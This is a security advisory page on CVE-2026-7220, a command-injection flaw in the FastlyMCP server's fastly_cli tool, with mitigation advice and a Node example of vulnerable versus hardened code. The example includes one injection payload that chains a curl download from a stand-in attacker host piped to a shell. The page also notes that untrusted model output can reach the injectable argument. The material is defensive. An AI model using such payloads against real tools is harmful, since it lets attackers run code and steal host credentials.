CVE-2026-7220: OS Command Injection in jackwrichards FastlyMCP
CVE-2026-7220 is a medium-severity OS command injection vulnerability in the fastly_cli tool of jackwrichards FastlyMCP, which by its name and tool layout is a Model Context Protocol (MCP) server wrapping the Fastly CLI. The 'command' argument handled in fastly-mcp.mjs reaches the operating system without adequate neutralization, so a remote attacker who can invoke the tool can execute arbitrary OS commands. The project follows a rolling release model, so no affected or fixed version numbers are listed; the affected range is identified by commit hash instead. The vendor had not responded to the issue report at the time of publication. The record indicates that a patch is available, but no advisory or patch reference is provided. The record also flags the product as a cloud service; if you run the MCP server yourself, updating it is your responsibility, not the vendor's. No exploitation in the wild has been observed.
AI Analysis
Technical Summary
The affected code is the fastly_cli tool in fastly-mcp.mjs of jackwrichards FastlyMCP, up to and including commit 6f3d0b0e654fc51076badc7fa16c03c461f95620. The tool accepts an argument named 'command' and passes it to the operating system without neutralizing shell metacharacters (OS command injection, CWE-78), so whoever can call the tool can run arbitrary commands with the privileges of the Node process hosting the server. The record describes the attack as remote and unauthenticated; the full CVSS vector string is not reproduced on this page. Because the project is released on a rolling basis there is no affected version number, so track the commit hash rather than a version. The vendor was notified before publication and has not responded. The CVSS 4.0 base score is 6.9 (medium). The record marks a patch as available but provides no patch link or advisory, and its Remediation Level field is null, so treat the fix as unconfirmed until you can see it in the repository history after the commit above. The record's "cloud service" flag should not be read as "the vendor patches it for you": an MCP server is typically installed and run by the operator.
Potential Impact
Successful exploitation gives the attacker arbitrary command execution on the host running FastlyMCP, with the privileges of the server process. On an operator workstation or CI runner that typically means access to any credentials on the host, including the Fastly API token the CLI is configured with, to local files, and to whatever network the host can reach. The medium score reflects a network-reachable vector with no privileges or user interaction required, as recorded by VulDB, combined with impact rated below complete compromise; the page does not show the vector or the scoring rationale. No exploitation in the wild has been reported.
Mitigation Recommendations
Check the FastlyMCP repository for commits after 6f3d0b0e654fc51076badc7fa16c03c461f95620 that change how fastly-mcp.mjs builds the CLI invocation, and update if such a fix exists; the record claims a patch but names none, so verify rather than assume. If you self-host the server, do not expose it to MCP clients you do not control, run it as a low-privilege user with a narrowly scoped Fastly token, and isolate it in a container or on a dedicated host. Until a fix is confirmed, do not let untrusted input, including model output that was itself driven by untrusted content, reach the 'command' argument. The generic fix for this bug class in Node is to stop building a shell string: validate the subcommand against an allowlist and pass the arguments as an argv array to child_process.execFile or spawn without shell: true.
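The bug class described above, as an added example that is not FastlyMCP's code: a Node tool that splices its `command` argument into a shell line, beside a hardened version that validates the subcommand against an allowlist and passes an argv array to `execFile` with no shell. The allowlist, the token rule, the `fastly` binary name, the payload and the injectable runner are assumptions for illustration; nothing here reflects how fastly-mcp.mjs is actually written.

```javascript
// Added example (not FastlyMCP's code): the shell-injection pattern this CVE
// class describes, beside a hardened replacement. The allowlist, the token
// rule, the "fastly" binary name and the payload are illustrative assumptions.

// VULNERABLE shape: the tool's `command` argument is spliced into a shell
// command line that `child_process.exec()` would hand to /bin/sh. Returned as
// a string here instead of executed so it can be inspected safely.
function buildShellCommandUnsafe(command) {
  return `fastly ${command}`;
}

// Hypothetical allowlist of Fastly CLI subcommands the tool may invoke.
const ALLOWED_SUBCOMMANDS = new Set(["service", "backend", "version", "whoami"]);

// One token: no whitespace, quotes, or shell metacharacters (; | & $ ` < > ( ) *).
// '-' is allowed so flags such as --json still work; which flags are acceptable
// is CLI-specific and not decided here.
const SAFE_TOKEN = /^[A-Za-z0-9._\/@:=-]+$/;

// Turn the tool's free-text `command` into a validated argv array.
function parseToolCommand(command) {
  if (typeof command !== "string" || command.length === 0 || command.length > 512) {
    throw new TypeError("command must be a non-empty string of at most 512 characters");
  }
  const [sub, ...rest] = command.trim().split(/\s+/);
  if (!ALLOWED_SUBCOMMANDS.has(sub)) {
    throw new Error(`subcommand not allowed: ${JSON.stringify(sub)}`);
  }
  for (const token of rest) {
    if (!SAFE_TOKEN.test(token)) {
      throw new Error(`rejected argument: ${JSON.stringify(token)}`);
    }
  }
  return [sub, ...rest];
}

// True when the validator blocks the input.
function isRejected(command) {
  try { parseToolCommand(command); return false; } catch { return true; }
}

// Real runner: argv array, no shell, so metacharacters are never interpreted.
// CommonJS-style lazy require; in an .mjs file use
// `import { execFileSync } from "node:child_process"` instead.
function execFileNoShell(bin, argv) {
  const { execFileSync } = require("node:child_process");
  return execFileSync(bin, argv, { encoding: "utf8", timeout: 30_000 }); // no shell: true
}

// HARDENED shape. `runner` is injectable so the example can be exercised
// without a real fastly binary on the machine.
function runFastlyCli(command, runner = execFileNoShell) {
  const argv = parseToolCommand(command);
  return runner("fastly", argv);
}

// Constructed attacker input: a benign-looking subcommand with a second
// command chained after it.
const PAYLOAD = "service list; curl http://attacker.example/x | sh";

// What reaches the OS under each design, using a recording runner.
function demo() {
  const calls = [];
  const recorder = (bin, argv) => { calls.push([bin, ...argv]); return ""; };
  runFastlyCli("service list --json", recorder);
  return {
    unsafeShellLine: buildShellCommandUnsafe(PAYLOAD), // whole line would go to /bin/sh
    payloadBlocked: isRejected(PAYLOAD),                // "list;" fails SAFE_TOKEN
    hardenedArgv: calls[0],                             // ["fastly","service","list","--json"]
  };
}
```

Save and run with `node`; `demo()` returns the two outcomes for the same payload. The validator is deliberately stricter than `execFile` alone needs: with no shell, metacharacters in argv are inert, but rejecting them also removes the attacker's ability to smuggle extra operands, and the subcommand allowlist is what stops the CLI from being driven into operations the tool never meant to expose.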
CVSS v4.0
Score: 6.9 (medium)
Technical Details
- Data Version: 5.2
- Assigner Short Name: VulDB
- Date Reserved: 2026-04-27T15:32:47.599Z
- CVSS Version: 4.0
- State: PUBLISHED
- Remediation Level: null
- Is Cloud Service: true
Threat ID: 69f035e3cbff5d861094ce30
Added to database: 4/28/2026, 4:21:55 AM
Last enriched: 5/5/2026, 7:39:40 AM
Last updated: 6/12/2026, 12:17:38 PM